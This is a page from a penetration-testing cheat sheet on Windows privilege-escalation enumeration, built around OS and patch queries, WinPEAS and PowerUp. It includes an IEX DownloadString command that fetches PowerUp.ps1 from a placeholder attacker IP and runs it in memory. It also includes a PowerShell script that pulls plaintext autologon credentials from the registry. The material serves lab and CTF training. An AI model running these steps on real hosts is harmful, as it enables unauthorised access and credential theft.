> For the complete documentation index, see [llms.txt](https://heinosass.gitbook.io/leet-sheet/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://heinosass.gitbook.io/leet-sheet/post-exploitation/untitled/windows-privilege-escalation/enumeration.md).

# Enumeration

## Manual Enumeration

Get OS version:

```
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```

Get service pack version (`wmic` is deprecated on recent Windows 10/11 builds and may be missing; on those, query `Win32_OperatingSystem` from PowerShell instead):

```
wmic os get servicepackmajorversion
```
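The same checks in PowerShell, as an added example that is not code from the original page. It works on hosts where `wmic` is gone, falls back to `Get-WmiObject` on PowerShell 2.0, and also reports whether the current shell is a 32-bit process on a 64-bit OS, which matters for every enumeration script that follows. The function name is my own; the class and property names are the standard `Win32_OperatingSystem` ones.

```powershell
# Added example, not from the original page. Collects the same fields as the
# systeminfo / wmic commands above via CIM, with a WMI fallback for old hosts.
function Get-OsEnumeration {
    $os = if (Get-Command Get-CimInstance -ErrorAction SilentlyContinue) {
        Get-CimInstance -ClassName Win32_OperatingSystem
    } else {
        Get-WmiObject -Class Win32_OperatingSystem   # PowerShell 2.0 fallback
    }

    # PROCESSOR_ARCHITEW6432 is only set for a 32-bit process running under
    # WOW64 on a 64-bit Windows; [IntPtr]::Size works on every .NET version.
    New-Object -TypeName PSObject -Property @{
        OSName            = $os.Caption                  # "OS Name" in systeminfo
        Version           = $os.Version                  # e.g. 10.0.19045
        Build             = $os.BuildNumber
        ServicePackMajor  = $os.ServicePackMajorVersion  # what the wmic query returns
        OSArchitecture    = $os.OSArchitecture           # "64-bit" / "32-bit"
        OSIs64Bit         = ($os.OSArchitecture -like '64*')
        ProcessIs64Bit    = ([IntPtr]::Size -eq 8)
        RunningUnderWow64 = [bool]$env:PROCESSOR_ARCHITEW6432
        LastBoot          = $os.LastBootUpTime
    }
}

$info = Get-OsEnumeration
$info | Format-List

# WOW64 redirection hides parts of the registry and System32 from a 32-bit
# process, so a 32-bit shell on a 64-bit OS makes later checks miss things.
if ($info.OSIs64Bit -and -not $info.ProcessIs64Bit) {
    Write-Warning 'This is 32-bit PowerShell on a 64-bit OS; switch to the 64-bit host before enumerating.'
}

# Installed patches, newest first: build number plus this list is what you
# compare against the requirements of kernel and driver exploits.
Get-HotFix | Sort-Object InstalledOn -Descending |
    Select-Object -First 10 HotFixID, Description, InstalledOn
```

Run it from the same PowerShell session you intend to use for WinPEAS or PowerUp so the bitness warning applies to the shell that actually runs the checks.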

## Automatic Enumeration

### WinPEAS

Great Windows privesc enumeration script.

{% embed url="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS" %}

If you transfer the output file to Linux, `cat` shows it coloured: the file contains raw ANSI escape sequences and `cat` passes them straight to the terminal. Vim does not interpret them, so it shows the escape codes as literal text.

Output redirected from Windows PowerShell (`>` or `Out-File` without `-Encoding`) is UTF-16LE, which most other tools won't handle. Convert it to UTF-8 first:

```
iconv -f utf-16le -t utf-8 winpeas.txt -o winpeas-utf-8.txt
```

After that you can page through it with **less**; `-R` passes the ANSI colour codes through to the terminal instead of escaping them.

```
less -R winpeas-utf-8.txt
```

**Caveats**:

* When I tested this script, it wasn't able to find autologon credentials, even though PowerUp was able to find them with `Get-RegistryAutoLogon` (WinPEAS checks for them but said it didn't find any in the "Bart" box on HTB)

### PowerUp

PowerUp may catch things WinPEAS misses, such as the autologon credentials mentioned in the caveat above, so it's worth running both.

Serve the script over HTTP from your machine:

```
python3 -m http.server 80
```

From PowerShell on the target, load the module into memory (nothing is written to disk):

```
IEX (New-Object Net.WebClient).DownloadString('http://YOUR_IP_ADDRESS_HERE/PowerUp.ps1');
```

Invoke all checks and save the output. `-Encoding ASCII` keeps the file readable on Linux without the UTF-16 conversion needed for WinPEAS output:

```
Invoke-AllChecks | Out-File -Encoding ASCII powerup.txt
```

**Caveats**:

* If you're running the script on a 64-bit machine, [make sure you're using 64-bit PowerShell](/leet-sheet/post-exploitation/untitled/cli-tips.md#switch-to-64-bit-powershell-from-32-bit). A 32-bit process sees the WOW64-redirected registry and file system, so some checks will miss things.
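Because the two scripts disagreed about autologon credentials on the box above, here is an added example (my own code, not PowerUp's `Get-RegistryAutoLogon` or WinPEAS's check) that reads the Winlogon autologon values directly so the question can be settled by hand. The function name is mine; the registry path and value names are the standard Winlogon ones.

```powershell
# Added example, not from PowerUp or winPEAS. Reads the Winlogon values that
# automated autologon checks are based on, so a disagreement between tools
# can be resolved by looking at the raw registry data.
function Get-AutoLogonInfo {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $p = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $p) { Write-Warning "Cannot read $key"; return }

    $names = 'AutoAdminLogon', 'DefaultDomainName', 'DefaultUserName', 'DefaultPassword',
             'AltDefaultDomainName', 'AltDefaultUserName', 'AltDefaultPassword'
    $info = New-Object -TypeName PSObject
    foreach ($n in $names) {
        # Add-Member so values that are absent show up as empty rather than throwing.
        $info | Add-Member NoteProperty $n ($p.$n)
    }
    $info
}

$al = Get-AutoLogonInfo
if (-not $al) { return }
$al | Format-List

if ($al.DefaultUserName -and $al.DefaultPassword) {
    Write-Host "[+] Plaintext autologon credentials: $($al.DefaultDomainName)\$($al.DefaultUserName) : $($al.DefaultPassword)"
} elseif ($al.AutoAdminLogon -eq '1' -and $al.DefaultUserName) {
    # Autologon is enabled but DefaultPassword is not in the registry: the
    # password is then usually held in the LSA secret 'DefaultPassword',
    # which requires SYSTEM to read.
    Write-Host "[*] Autologon on for $($al.DefaultUserName), password not in registry (check LSA secrets as SYSTEM)"
} else {
    Write-Host '[-] No autologon credentials in the registry'
}
```

If this shows a `DefaultPassword` that an automated script did not report, trust the registry; the scripts only summarize these same values.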
